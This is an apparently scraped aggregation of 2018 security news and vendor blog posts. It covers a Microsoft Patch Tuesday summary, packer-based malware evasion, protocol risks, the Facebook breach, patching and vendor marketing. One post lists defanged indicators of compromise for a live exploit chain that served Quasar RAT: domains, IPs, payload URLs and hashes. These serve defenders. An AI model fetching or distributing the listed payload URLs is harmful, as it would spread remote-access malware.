CVE-2018-8491, CVE-2018-8460 and CVE-2018-8509 are memory corruption vulnerabilities in the Internet Explorer web browser. In both cases, an attacker needs to trick the user into visiting a specially crafted, malicious website that can corrupt the browser’s memory, allowing for remote code execution in the context of the current user. This class of vulnerabilities is especially dangerous since a spam campaign can be used to trick the user while hiding the attack from network protections with HTTPS.

CVE-2018-8473 is a remote code execution vulnerability in Microsoft Edge. The bug lies in the way the web browser accesses objects in memory. An attacker could trick a user into visiting a malicious website or take advantage of a website that accepts user-created content or advertisements in order to exploit this vulnerability.

CVE-2018-8513, CVE-2018-8500, CVE-2018-8511, CVE-2018-8505 and CVE-2018-8510 are memory corruption vulnerabilities in the Chakra scripting engine that affects a variety of products. In all cases, an attacker could exploit these vulnerabilities to execute code on the system in the context of the current user and completely take over the system. This class of vulnerabilities is especially dangerous since a spam campaign can be used to trick the user while hiding the attack from network protections with HTTPS.

CVE-2018-8494 is a remote code execution vulnerability that exists when the MSXML parser in Microsoft XML Core Services processes user input. An attacker can exploit this bug by invoking MSXML through a web browser on a specially crafted website. The user also needs to convince the user to open the web page.

CVE-2018-8490 and CVE-2018-8489 are remote code execution vulnerabilities in the Windows Hyper-V hypervisor. The bugs lie in the way the host server on Hyper-V fails to properly validate input from an authenticated user on a guest operating system. An attacker could exploit these vulnerabilities by running a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.

Important vulnerabilities

There are also 34 important vulnerabilities in this release. We would like to specifically highlight 22 of them.

CVE-2018-8512 is a security feature bypass vulnerability in Microsoft Edge. The web browser improperly validates certain specially crafted documents in the Edge Content Security Policy (CSP), which could allow an attacker to trick a user into loading a malicious page.

CVE-2018-8448 is an elevation of privilege vulnerability in the Microsoft Exchange email server. The bug exists in the way that Exchange Outlook Web Access improperly handles web requests. An attacker could exploit this vulnerability by performing script or content injection attacks that trick the user into disclosing sensitive information. They could also trick the user into providing login credentials via social engineering in an email or chat client.

CVE-2018-8453 is an elevation of privilege vulnerability in the Windows operating system that occurs when the Win32k component improperly handles objects in memory. An attacker could obtain the ability to run arbitrary code in kernel mode by logging onto the system and then run a specially crafted application.

CVE-2018-8484 is an elevation of privilege vulnerability in the DirectX Graphics Kernel driver that exists when the driver improperly handles objects in memory. An attacker could log onto the system and execute a specially crafted application to exploit this bug and run processes in an elevated context.

CVE-2018-8423 is a remote code execution vulnerability in the Microsoft JET Database Engine that could allow an attacker to take control of an affected system. A user must open or import a specially crafted Microsoft JET Database Engine file on the system in order to exploit this bug. They could also trick a user into opening a malicious file via email.

CVE-2018-8502 is a security feature bypass vulnerability in Microsoft Excel when the software fails to properly handle objects in protected view. An attacker could execute arbitrary code in the context of the current user if they convince the user to open a specially crafted, malicious Excel document via email or on a web page. This bug cannot be exploited if the user opens the Excel file in just the preview pane.

CVE-2018-8501 is a security feature bypass vulnerability in Microsoft PowerPoint. The bug exists when the software improperly handles objects in protected view. An attacker can execute arbitrary code in the context of the current user if they convince the user to open a specially crafted PowerPoint file. This bug cannot be exploited if the user only opens the file in preview mode.

CVE-2018-8432 is a remote code execution vulnerability that lies in the way Microsoft Graphics Components handles objects in memory. A user would have to open a specially crafted file in order to trigger this bug.

CVE-2018-8504 is a security feature bypass vulnerability in the Microsoft Word word processor. There is a flaw in the way the software handles objects in protected view. An attacker could obtain the ability to arbitrarily execute code in the context of the current user if they convince the user to open a malicious Word document. The bug cannot be triggered if the user opens the file in preview mode.

CVE-2018-8427 is an information disclosure vulnerability in Microsoft Graphics Components. An attacker could exploit this vulnerability by tricking the user into opening a specially crafted file, which would expose memory layout.

CVE-2018-8480 is an elevation of privilege vulnerability in the Microsoft SharePoint collaborative platform. The bug lies in the way the software improperly sanitizes a specially crafted web request to an affected SharePoint server. An attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server.

CVE-2018-8518, CVE-2018-8488 and CVE-2018-8498 are elevation of privilege vulnerabilities in the Microsoft SharePoint Server. An attacker can exploit these bugs by sending a specially crafted request to an affected SharePoint server, allowing them to carry out cross-site scripting attacks and execute code in the context of the current user.

CVE-2018-8333 is an elevation of privilege vulnerability in Filter Management that exists when the program improperly handles objects in memory. An attacker needs to log onto the system and delete a specially crafted file in order to exploit this bug, which could lead to them gaining the ability to execute code in the context of an elevated user.

CVE-2018-8411 is an elevation of privilege vulnerability that exists when the NFTS file system improperly checks access. An attacker needs to log onto the system to exploit this bug and then run a specially crafted application, which could lead to the attacker running processes in an elevated context.

CVE-2018-8320 is a security feature bypass vulnerability that exists in the DNS Global Blocklist feature. An attacker who exploits this bug could redirect traffic to a malicious DNS endpoint.

CVE-2018-8492 is a security bypass vulnerability in the Device Guard Windows feature that could allow an attacker to inject malicious code into Windows PowerShell. An attacker needs direct access to the machine in order to exploit this bug, and then inject malicious code into a script that is trusted by the Code Integrity policy. The malicious code would then run with the same access level as the script, and bypass the integrity policy.

CVE-2018-8329 is an elevation of privilege vulnerability in Linux on Windows. The bug lies in the way Linux improperly handles objects in memory. An attacker can completely take control of an affected system after logging onto the system and running a specially crafted application.

CVE-2018-8497 is an elevation of privilege vulnerability that exists in the way the Windows Kernel handles objects in memory. A locally authenticated attacker can exploit this bug by running a specially crafted application.

CVE-2018-8495 is a remote code execution vulnerability that exists in the way Windows Shell handles URIs. An attacker needs to convince the user to visit a specially crafted website on Microsoft Edge in order to exploit this vulnerability.

CVE-2018-8413 is a remote code execution vulnerability that exists when “Windows Theme API” improperly decompresses files. A victim can exploit this bug by convincing the user to open a specially crafted file via an email, chat client message or on a malicious web page, allowing the attacker to execute code in the context of the current user.

Other important vulnerabilities:

Moderate vulnerabilities

Of the two moderate vulnerabilities disclosed by Microsoft, Talos believes one is worth highlighting.

CVE-2010-3190 is a remote code execution vulnerability in the way that certain applications built using Microsoft Foundation Classes handle the loading of DLL files. An attacker could take complete control of an affected system by exploiting this vulnerability. At the time this bug was first disclosed, Exchange Server was not identified as an in-scope product, which is why this release highlights a flaw from 2010.

The other moderate vulnerability is CVE-2018-8533.

Low vulnerability

There is also one low-rated vulnerability, which Talos wishes to highlight.

CVE-2018-8503 is a remote code execution vulnerability in the way that Chakra scripting engine handles objects in memory in the Microsoft Edge web browser. An attacker needs to convince a user to visit a malicious website or malicious content on a web page that allows user-created content or advertisements in order to exploit this bug.

Coverage

In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort rules: 48045 - 48057, 48058 - 48060, 48062, 48063, 48072, 48073

Threat Actors Use Delphi Packer to Shield Binaries From Malware Classification

Threat actors are increasingly using a Delphi packer to shield their binaries from malware classification by antivirus software and other security solutions.

FireEye analyzed several samples carrying the “BobSoft Mini Delphi” signature and determined that the samples were consistent with Delphi code constructs. These findings revealed that the malware binaries had been packed using a Delphi packer.

The enterprise security firm observed the packed samples being dropped in various spam campaigns. One operation used an attached document with malicious macros to download the malware. Another leveraged a document that exploited an equation editor vulnerability to deploy its packed payload.

In its analysis, FireEye came across at least eight malware families using the Delphi packer for their campaigns. Lokibot was by far the most prominent, followed by the Pony downloader and NanoCore. Researchers also spotted a cryptomining threat called CoinMiner using the packer.

How Do Malicious Actors Avoid Malware Classification?

The Delphi packer is just the latest cybercriminal effort to prevent malware from being detected or reverse engineered. Attackers do this by concealing their payloads with code that’s not strictly malicious. In particular, packers use a technique called executable compression to make their files smaller. The Delphi packer adds on to this functionality by monitoring windows and mouse cursor movement for signs of a sandbox environment, in which case it puts itself into an infinite sleep.

Packers aren’t the only services that bad actors use to hide their malware. Malwarebytes noted that cybercriminals also turn to crypters, which use obfuscation or actual encryption to make their payloads undetectable, and protectors, which block reverse engineering attempts.

How to Protect Against Packed Malware

According to FireEye, security professionals can protect their organizations against packed malware by using sandbox environments that model real user behavior. The threat advisory on IBM X-Force Echange advises users to update their antivirus software and verify the legitimacy of any unsolicited email attachment. Finally, security personnel should analyze threat intelligence to learn about the latest packers that are available in dark web marketplaces.

Sources: FireEye, Malwarebytes

The post Threat Actors Use Delphi Packer to Shield Binaries From Malware Classification appeared first on Security Intelligence.

Mozilla Patched Two Critical Vulnerabilities In Firefox

Mozilla endeavors to play safe for its browsers by fixing the flaws as it spots them. Once again, Mozilla has

Mozilla Patched Two Critical Vulnerabilities In Firefox on Latest Hacking News.

Mozilla Patched Multiple Vulnerabilities In Thunderbird 60.2.1

Mozilla’s email client Thunderbird exhibited several security flaws that posed a threat to users’ security. As reported, upon discovering these

Mozilla Patched Multiple Vulnerabilities In Thunderbird 60.2.1 on Latest Hacking News.

A week in security (October 1 – 7)

Last week, Malwarebytes welcomed National Cybersecurity Awareness Month by renewing our pledge to do what we do best: offer the best protection for our customers and promote security awareness for all.

On Labs, we raised the question of whether it is a good idea to bring your own security or not, talked a little bit more about fileless malware, homed in on a malware campaign targeting Fortnite gamers, and looked into LoJack, a bootkit malware that has been targeting government entities.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (October 1 – 7) appeared first on Malwarebytes Labs.

Researchers Find 18 Security Vulnerabilities in Foxit PDF Reader

A free browser plugin for creating, editing and viewing PDF files contains 18 security vulnerabilities that could expose users to remote code execution, researchers warned.

According Cisco Talos, the Foxit PDF Reader, which is often used in place of Adobe’s Acrobat application, was designed to securely open protected documents and notify users when new versions of a PDF have been created. The vulnerabilities are primarily found in the product’s JavaScript engine, which was designed to support interactive and dynamic documents, such as PDFs.

How Could the Security Vulnerabilities Be Exploited?

Closing a document can free up used objects embedded in the JavaScript code while the engine continues to operate. Threat actors can take advantage of this window of opportunity — dubbed a “free-after-use” condition — to execute arbitrary code to steal data or perform other malicious actions.

To execute the attack, the researchers noted that, in most cases, the cybercriminals would first need to fool a Foxit user into opening a malicious file. Once any of the 18 security vulnerabilities has been triggered, however, remote code execution attacks could allow attackers to run commands on the victim’s system.

The researchers did not report any instances of users being impacted by the flaws, but they noted that a patch is available that covers all 18 vulnerabilities.

Mitigating the Rush-to-Release Effect

The software market is competitive, and a recent IBM study argued that developers are not necessarily experts in security. As a result, applications are often rushed to release before they can be adequately protected from security vulnerabilities.

The report recommended a strategy that starts with evaluating how important an application is to a particular business or user, scoring the potential risks and then ensuring that the right tools are in place to test and fix any security vulnerabilities that are discovered. Security professionals should regularly review this strategy to gauge the organization’s preparedness for threats such as remote code execution before they happen.

Source: Cisco Talos

The post Researchers Find 18 Security Vulnerabilities in Foxit PDF Reader appeared first on Security Intelligence.

GitLab API Vulnerability Leaked Confidential Data On Public Projects

GitLab – a web-based repository manager – has recently patched a critical flaw in its API that posed a security

GitLab API Vulnerability Leaked Confidential Data On Public Projects on Latest Hacking News.

Watch out! The risks associated with BGP, FTP, and NTP protocols

The risks associated with BGP, FTP, and NTP protocols

Most of the news about attacks that use basic Internet protocols focuses on the World Wide Web. This means that HTTP and DNS are usually the key players, and as such, many policies, and a lot of the cybersecurity software in use, are mainly focused on these protocols. However, there are also risks related to other protocols that can also be used by cybercriminals as attack vectors. These protocols are BGP, NTP and FTP. All three can mean real risks for a company’s information, and at times they don’t receive the attention they deserve given the potential threat that they can pose. Below, we’ll look into what each of them implies and how cyberattackers can use them.

BGP

The Border Gateway Protocol is used to exchange routing information between autonomous systems – that is, those groups of IP networks that have their own, independent policies. Essentially, it is a protocol used by large nodes on the Internet to communicate between themselves and convey a large quantity of information between points on the network. For this reason, one of the risks related to this protocol is that, for the vast majority of users, it is very complex, and companies only start to work directly with this protocol when they have their own large scale networks.

An example of an attack using this protocol was the leaking of information from cryptocurrency wallets, as the provider Cloudflare explained. In general, the cyberattacker manages to “trick” the network into redirecting companies’ or users’ IP prefixes, and when the network responds in order to send information, this information is leaked to the cyberattacker.

Diagram of attack with protocols
Diagram of the attack (Source: Cloudfare)

NTP

The Network Time Protocol (NTP) is mainly used to synchronize clocks on the computers on a network. However, older versions of the protocol on some networks also have a monitoring service that allows administrators to compile a list of the 600 hosts that have connected to the server, via a command called Monlist. The cyberattackers leverage this feature by carrying out a “reflex attack”: they send a package with a false IP address, through which they obtain the list from the Monlist command. Afterwards, they amplify it by carrying out a denial of service attack (DDoS) that can leave the connection of all addresses of the hosts on the list temporarily out of action.

FTP

Although HTTP is used more and more often to send files, the old file transfer protocol (FTP) is still present on many systems and in many companies. Given that it wasn’t originally designed to be a secure transfer protocol, it has many vulnerabilities that attackers can take advantage of. This is exactly what happened last year. The FBI warned of an attack on FTP servers belonging to hospitals and dental clinics that aimed to access patients’ medical records by exploiting a vulnerability that uses an anonymous mode of FTP: older FTP servers can be accessed with a common user name such as “anonymous” or “ftp”, with no need to introduce a password or user name.

How to avoid attacks via these protocols

As we commented before, these protocols are less common for cyberattackers than HTTP, but that doesn’t mean that they’re going to stop posing a risk to companies. This is why organizations must follow certain general guidelines to prevent attacks that use them.

  • Adoption of MANRS: The MANRS (Mutually Agreed Norms for Routing Security) are a joint initiative created by network operators and Internet exchange points (IXPs) with the aim of developing stronger routing security to avoid, among other things, BGP attacks. Any large company that has broad control over its networks and nodes should adopt them.
  • Updating networks and their protocols: the most common attacks over NTP protocols happen because outdated versions are being used. The same thing happens with FTP, since it is a primitive protocol that, by default, wasn’t designed with encryption for the exchange of files (for this, there are encrypted modes: FTPS). IT teams in companies should use the most up-to-date versions of these protocols in order to avoid potential cyberattacks.
  • Correct configuration of servers An incorrectly configured FTP can allow cyberattackers a way in if they connect in anonymous mode. A configuration of the FTP server that requires a secure password is already a more complex barrier for the attacker. In the same way, the NTP protocol can leave its list of hosts exposed if it doesn’t have its accesses correctly configured.
  • Advanced cybersecurity solutions: as well as all the above, it is vital that companies of any size have an advanced cybersecurity solution active on all endpoints – one that is able to prevent, detect, and neutralize attacks at all times.

The post Watch out! The risks associated with BGP, FTP, and NTP protocols appeared first on Panda Security Mediacenter.

Cisco Patched Two Critical Vulnerabilities in Digital Network Architecture Center

This week, Cisco patched two critical security vulnerabilities in the Digital Network Architecture Center. The patches come alongside massive updates for

Cisco Patched Two Critical Vulnerabilities in Digital Network Architecture Center on Latest Hacking News.

SQL Injection Exposed Data From Canadian ISP – Altima Telecom

Handling customer data requires a lot of caution by organizations. A slight negligence or glitch in the data security system

SQL Injection Exposed Data From Canadian ISP – Altima Telecom on Latest Hacking News.

Adobe October Patch Update Fixed 86 Different Security Vulnerabilities

In an attempt to prove their vigilance for security, Adobe has once again addressed a number of security flaws that

Adobe October Patch Update Fixed 86 Different Security Vulnerabilities on Latest Hacking News.

Vulnerability Spotlight: Google PDFium JBIG2 Image ComposeToOpt2WithRect Information Disclosure Vulnerability


Discovered by Aleksandar Nikolic of Cisco Talos

Overview


Cisco Talos is releasing details of a new vulnerability in Google PDFium's JBIG2 library. An exploitable out-of-bounds read on the heap vulnerability exists in the JBIG2-parsing code in Google Chrome, version 67.0.3396.99. A specially crafted PDF document can trigger an out-of-bounds read, which can possibly lead to an information leak. That leak could be used as part of an exploit. An attacker needs to trick the user into visiting a malicious site to trigger the vulnerability.

In accordance with our coordinated disclosure policy, Cisco Talos has worked with Google to ensure that these issues have been resolved and that an update has been made available for affected users. It is recommended that this update is applied as quickly as possible to ensure that systems are no longer affected by this vulnerability.

Vulnerability Details

Google PDFium JBIG2 Image ComposeToOpt2WithRect Information Disclosure Vulnerability (TALOS-2018-0639 / CVE-2018-16076)

 

PDFium is an open-source PDF renderer developed by Google and used extensively in the Chrome browser, as well as other online services and standalone applications. This bug was fixed in the latest Git version, as well as the latest Chromium address sanitizer build available.

A heap buffer overflow is present in the code responsible for decoding a JBIG2 image stream. An attacker needs to provide a specific PDF that describes the JBIG2 image details in order to exploit this vulnerability. Detailed vulnerability information can be found here.

Known vulnerable versions


Google Chrome version 67.0.3396.99

https://chromereleases.googleblog.com/2018/09/stable-channel-update-for-desktop.html


Coverage


The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 47340 - 47341

NotPetya Horror Story Highlights Need for Holistic Security

The NotPetya malware’s ability to cripple even sophisticated, global firms is a cautionary tale about the need for businesses to understand their risk and take a holistic view of security says Fadi Albatal, Chief Strategy Officer at Hitachi Systems Security.* If you’re keen on information security and happen to enjoy horror stories, point...

Read the whole entry... »

Related Stories

Apple iOS 12 Texting Bug Sends Messages To Wrong Contacts

Apple’s iOS 12 seems in trouble these days. on one hand, we see people discovering security vulnerabilities, such as those

Apple iOS 12 Texting Bug Sends Messages To Wrong Contacts on Latest Hacking News.

Foxit PDF Reader Fixes High-Severity Remote Code Execution Flaws

Foxit Software has patched over 100 vulnerabilities in its popular Foxit PDF Reader. Many of the bugs tackled by the company include a wide array of high severity remote code execution vulnerabilities. Foxit on Friday released fixes for Foxit Reader 9.3 and Foxit PhantomPDF 9.3, which addressed a whopping 124 vulnerabilities. It’s important to note […]

Episode 114: Complexity at Root of Facebook Breach and LoJax is a RAT You Can’t Kill

In this week’s podcast: Facebook revealed that a breach affected 50 million accounts and as many as 90 million users. Is complexity at the root of the social media giant’s troubles? We speak with Gary McGraw of the firm Synopsys about it. Also: BIOS-based malware has been demonstrated at security conferences for years.  Last week, the...

Read the whole entry... »

Related Stories

SecurityWeek RSS Feed: Passcode Bypass Method Exposes Photos, Contacts on iPhone XS

An iPhone enthusiast has disclosed yet another method for bypassing the iPhone lockscreen. The latest technique has been confirmed to work on the new iPhone XS running the latest version of Apple’s mobile operating system, iOS 12.

read more



SecurityWeek RSS Feed

Complicated iOS 12 Passcode Bypass Exposes iPhone Data To Hackers

Apple’s latest iOS 12 was seemingly outstanding with it’s extra security features and user data privacy and security. However, one cannot

Complicated iOS 12 Passcode Bypass Exposes iPhone Data To Hackers on Latest Hacking News.

Telegram Patched IP Address Leak Problem In Its Desktop Client

Telegram has become increasingly popular worldwide due to its secure nature. The provision of encrypted conversations, both in texts as

Telegram Patched IP Address Leak Problem In Its Desktop Client on Latest Hacking News.

Facebook: How to minimize the risk of vulnerabilities

Facebook: how to avoid the risks of vulnerabilities

In the last few months, the world’s most popular social network has faced several problems when it comes to data protection. In July of this year, the Information Commissioner’s Office (ICO) in the UK imposed a £500,000 fine on Facebook for its implication in the Cambridge Analytica case. This was the maximum possible fine, given that the incident occurred before the implementation of the GDPR.

Now, a new data protection scandal has rocked the Internet giant. Last Friday, as Guy Rosen, VP of Product Management explained, almost 50 million accounts were exposed to an attack that happened on Tuesday September 25. The attack was made possible thanks to a vulnerability in the video uploading function that also affected the “View as” function, that allows people to see what their own profile looks to other users. This vulnerability would have allowed the attackers to steal users’ access tokens – a kind of key that means that users don’t have to reenter their passwords every time they access the site. Theoretically, with these tokens, an attacker could gain access to any third-party app that uses Facebook to log in.

Facebook, the initial response to the attack

It didn’t take long for Facebook to react – they notified the Data Protection Commission (DPC) in Ireland, where the company’s European headquarters are located. Under the rules of the GDPR, a company is obliged to inform of a data breach within 72 hours of its discovery. However, the DPC has said that it needs more information about the attack, such as the number of European users affected and the risk that they face, in order to carry out their investigation.

Since the incident happened after the GDPR came into force, the social network could face a fine of up to 4% of the annual worldwide turnover of the preceding financial year, which, in the case of Facebook, would be $1.63 billion (€1.4 billion). But this economic sanction isn’t the only repercussion; we can also add the reputational damage that the firm will suffer, another key aspect in this kind of incident. Many users will lose confidence in the company thanks to this data breach, and this loss of confidence may turn into a loss of clients and money.

Personal data, fuel for companies

There’s no doubt that personal information is power, and means serious money. How companies process and use this data is varied and sophisticated, and is very lucrative. Business of this kind is very simple: we hand over information in return for a service. But the service is paid for with our personal data. And organizations are responsible for looking out for our safety when it comes to possible cybercrimes whose ultimate goal is to compromise our privacy, such as phishing, digital identity theft, or the exploitation of unpatched vulnerabilities, as was the case in this latest incident.

With all of this in mind, it seems that it is now easier than ever to be the victim of a cyberattack. While this is true to a certain extent, it is also true that prevention, detection, response and remediation systems are more and more efficient. Combining, as is the case with Panda Adaptive Defense, solutions and services to optimize protection, reduce the attack surface, and minimize the impact of these threats.

And the fact is that, with the number of documented glitches and vulnerabilities –  now up to 20,000 cases, a 38% increase compared to five years ago –  the first thing to bear in mind is limiting the attack surface. At tech giants such as Facebook, this may seem like a pipe dream. But keeping confidential information safe from theft or data kidnapping – even if it’s an exorbitant amount, as is the case with the 50 million Facebook profiles – today it is possible thanks to solutions such as Panda Patch Management, the new module of Adaptive Defense, that reduces the complexity of managing patches and updates in operating systems and hundreds of third party applications.

What’s more, Panda Patch Management helps companies to comply with the accountability principle. Many regulations such as GDPR, HIPAA and PCI, force organizations to take the appropriate technical and organizational measures to ensure proper protection of the sensitive data under their control, as is the case with Facebook. Thanks to real time updates, this module provides visibility of the health of endpoints in terms of pending vulnerabilities and updates for the system, allowing it to get ahead of exploits of these vulnerabilities.

How to protect your company

  • Hackers exploit vulnerabilities in unpatched programs. Keep your software and devices up-to-date.
  • Having an automatic vulnerability detection solution reduces the possibility of suffering a security breach by up to 20%.
  • Get absolute control of personal data and protect your pocket: with the GDPR, correct, speedy management by the DPO will save you economic sanctions and reputational damage.
  • The ability to efficiently and quickly compile detailed reports with the information about an incident of this type – how, when, and how much – is very important to facilitate the work of data protection agencies. The module Panda Data Control allows you to discover, audit and monitor unstructured personal data on the endpoints in your company.

The post Facebook: How to minimize the risk of vulnerabilities appeared first on Panda Security Mediacenter.

Mutagen Astronomy – Linux Vulnerability Hits CentOS, Debian, and Red Hat Distros

Researchers have discovered a critical vulnerability that allegedly affects multiple Linux distros. The vulnerability named Mutagen Astronomy allows an attacker

Mutagen Astronomy – Linux Vulnerability Hits CentOS, Debian, and Red Hat Distros on Latest Hacking News.

Apple DEP Authentication Flaw Leaves Devices Vulnerable To Malicious MDM Enrolling

Researchers discovered a vulnerability in the Apple’s Device Enrollment Program (DEP). This Apple DEP authentication flaw could allow potential attackers

Apple DEP Authentication Flaw Leaves Devices Vulnerable To Malicious MDM Enrolling on Latest Hacking News.

Mojave Flaws Allow An Attacker To Bypass Full Disk Access Requirement

Right after the launch of the latest MacOS Mojave, researchers have begun discovering various security vulnerabilities. Amidst the claims of

Mojave Flaws Allow An Attacker To Bypass Full Disk Access Requirement on Latest Hacking News.

Critical Security Vulnerability in Facebook Affects 50 million Users!

Facebook recently released a press update about a critical security flaw affecting its application, which they promptly fixed after it

Critical Security Vulnerability in Facebook Affects 50 million Users! on Latest Hacking News.

Millions of accounts affected in latest Facebook hack

Facebook announced earlier today that its social network had been hacked, resulting in 40 million accounts that were directly impacted, while another 50 million were also considered to be potentially affected.

Attackers exploited a feature in Facebook called “View As,” which essentially shows how your profile looks to others. The flaw enabled them to get ahold of so-called Access Tokens, which allowed them to be logged in as genuine Facebook users without having to use their password.

The feature has for now being turned off and the underlying vulnerability fixed. A law enforcement investigation is ongoing to determine the full scope of this hack and identify the eventual perpetrators.

Facebook says they have taken actions and that there is no need for users to reset their passwords, although it is a good opportunity remind users that passwords should be complex and not reused across multiple services.

We recommend people follow the Facebook hack story to get a better idea of what exactly was accessed and take the necessary precautions. We will keep Labs readers informed of further developments.

The post Millions of accounts affected in latest Facebook hack appeared first on Malwarebytes Labs.

The consequences of not applying patches

The consequences of not applying patches

The digital transformation makes the task of reducing the attack surface more difficult, given the exponential growth of users, devices, systems, and third party applications that need to be updated. And as a consequence, the range of possible cyberthreats is considerably larger. The costs that these attacks suppose for businesses and users also add to the problem: it is estimated that by 2021 the cost of cybercrime will reach $6 trillion.

But as well as sharing a goal of making money, many of the most costly cyberincidents in the last few years have shared another characteristic: they have been made possible thanks to an unpatched vulnerability in an IT system.

Discover Panda Patch Management

In this article we’ve compiled some of the most infamous vulnerabilities and the problems they’ve caused for the IT systems where they’ve been found.

EternalBlue

One of the most problematic vulnerabilities of the last year is one that affects Microsoft Server Message Block (SMB). It is called EternalBlue, and it was allegedly developed by the US National Security Agency (NSA). It came to light in April 2017, when the hacking group the Shadow Brokers revealed that the NSA was collecting vulnerabilities of this kind. And the list of attacks that have been made possible by this vulnerability is extensive.

The most famous use was WannaCry, which affected over 300,000 companies all over the world, and cost a total of around $4 billion. The malware NotPetya, which came to light just a month later, was able to get onto systems thanks to this vulnerability, stealing passwords in order to take control of the network that it accessed.

And we’re not just talking about ransomware: shortly after the WannaCry attacks, we started to see a piece of malware called Adylkuzz, which used EternalBlue to download a series of commands onto infected computers. These commands were then used to mine and extract cryptocurrencies.

EternalRomance

Bad Rabbit, another ransomware, shared many elements of the code found in NotPetya. However, this time it exploited another vulnerability – also developed by the NSA and also in SMB – called EternalRomance. The attack mainly affected users in Eastern Europe and Russia.

At the start of this year, the Winter Olympics in Pyeongchang experienced a cyberattack. During the opening ceremony, attackers interfered with the Internet connection, the website of the games, and television services. In order to carry this out, those behind the attack made use of EternalRomance.

Recent cyberattack trends such as cryptojacking have taken advantage of these vulnerabilities to spread. The malware PyRoMine used EternalRomance to infect computers and use their CPU to mine the cryptocurrency Monero.

How could these attacks have been avoided? The answer is simple: there was a patch for these all vulnerabilities available months before the incidents. However, many organizations have trouble applying the right patches, or don’t have patching policies, which means that vulnerabilities of this kind may go unnoticed. What’s more, EternalBlue is still threatening unpatched systems

Web applications

In 2017, cybercriminals used a vulnerability in the software Apache Struts to launch a piece of ransomware called Cerber. According to some sources, they made over $100,000 in Bitcoin thanks to this ransomware. And this wasn’t the only use of this vulnerability in Apache Struts.

Personal data breaches

Though ransomware and malware may be the most attention grabbing results of an unpatched vulnerability, they’re far from the only consequences. Some of the most serious exfiltrations of personal data have been a direct result of unpatched IT systems.

In 2017, the US company Equifax revealed that it had lost the personal data of over 145 million people, in one of the largest breaches of this kind in history. The cause of this breach?  The same vulnerability in Apache Struts that had been used by Cerber. According to Equifax, the blame fell on an employee who didn’t apply the relevant patch – a patch that was available two months before the breach and would have been enough to stop it from happening.

This case is not the only one. The insurance company Nationwide Mutual Insurance agreed to a $5.5 million payout for a breach of the data of 1.27 million people in 2012 – a breach that was also made possible by a vulnerability in a web application for which a patch had been available three years before the incident.

The phone company Carphone Warehouse faced a £400,000 fine for a breach that it suffered in 2015, that was facilitated by a vulnerability in the version of WordPress that the company was using, which hadn’t been updated since 2009.

In fact, according to a study, over 80% of personal data breaches are the result of poor patch management. This means that a company can significantly reduce the risk of suffering this kind of incident by implementing an efficient patching policy.

The solution?

One of the reasons that companies have trouble finding and applying relevant patches is a lack of resources and time. What’s more, a lot of the time it is difficult to prioritize which patches to apply first.

However, although here we have seen just a few examples, the fact is that the majority of attacks and exploits take advantage of outdated systems and third party applications, exploiting known vulnerabilities. Vulnerabilities that have an update available weeks, or even months before the breach.

With Panda Patch Management you can be sure of always having the most relevant patches installed. Patch Management automatically searches for necessary patches to keep the devices on your system safe, prioritizing the most urgent updates. This way you can avoid incidents, systematically reducing the attack surface created by vulnerabilities, applying critical updates immediately from the cloud console.

Download the product sheet here

The post The consequences of not applying patches appeared first on Panda Security Mediacenter.

Report: Hacking Risk for Connected Vehicles Shows Significant Decline

Smart vehicles are less vulnerable than they were a few years ago, thanks to improvements in security according to a new report from the security firm IOActive. IOActive conducted vulnerability assessments of real-world vehicle systems for its “Commonalities in Vehicle Vulnerabilities 2018 Remix” paper, and found that both the...

Read the whole entry... »

Related Stories

Buggy implementation of CVE-2018-8373 vulnerability used to deliver Quasar RAT

A variant of a remote code execution vulnerability with Internet Explorer’s scripting engine known as CVE-2018-8373 patched last August has been found in the wild. Looking at the IOCs posted by our colleagues at TrendMicro, we recognized the infrastructure serving this exploit. The same static domain has been active since at least early July, and is being redirected to from an adult website injected with a malicious script.

In the below traffic capture from August, we were served CVE-2018-8174, which is thought to be from the same author. It is interesting to note that this is not an exploit kit, but rather appears to be a single actor who implemented the available Proof of Concept to distribute his payload, the Quasar Remote Administration Tool (RAT).

During our tests with this new variant of CVE-2018-8373, we found it to be quite unstable and failing to detonate its payload via Powershell invocation. However, a working CVE-2018-8174 was still serving the same payload we had captured back in August.

The source code for CVE-2018-8373 has been uploaded to many platforms already (PasteBin, VirusTotal), including to the AnyRun sandbox. That sample triggers the exploit and spawns PowerShell. In the following animation, we replayed this attack to show how our anti-exploit technology is able to mitigate this vulnerability at various levels.

We can expect that other treat actors will be looking at this code for possible implementation. However, unless it is improved, it is unlikely to be integrated into exploit kits, considering that its cousin, CVE-2018-8174, works flawlessly.

Indicators of compromise

Injected adult site

198.211.33[.]67
clubtubes[.]com

Exploit serving domain

54.191.17[.]130
myswcd[.]com/vol/m3.html,CVE-2018-8373
myswcd[.]com/vol/m2.html,CVE-2018-8174
myswcd[.]com/vol/me.html,CVE-2018-8174

Payload

myswcd[.]com/vol/s1.exe,Loader
myswcd[.]com/vol/v1.exe,Installer
myswcd[.]com/vol/v2.exe,Quasar RAT
7EEF6EF8FED53B7C3BF61BA821F375A0A433EA4CB0185FD223780B729A9A5792
268909BC33F0F8C5312B51570016311E3676AF651A57DE38E42241DCC177B2D6
D9A967D0CAA8DB86FECA3AE469EF6797E81DFDAC4D8531658CB242A87C80CE05

The post Buggy implementation of CVE-2018-8373 vulnerability used to deliver Quasar RAT appeared first on Malwarebytes Labs.

Firefox DoS Proven to Crash Browsers and Sometimes Even Users PC’s

Last week, a security researcher pointed out how a CSS-based attack could crash iPhones, iPads, and Mac devices. The same

Firefox DoS Proven to Crash Browsers and Sometimes Even Users PC’s on Latest Hacking News.

United Nations Mistakenly Exposed Sensitive Data to The Public

After a lot of organizations and spy firms confessing accidental exposure of their data, the recent incident lists an even

United Nations Mistakenly Exposed Sensitive Data to The Public on Latest Hacking News.

Podcast Episode 113: SAP CSO Justin Somaini and Election Hacks – No Voting Machines Required!

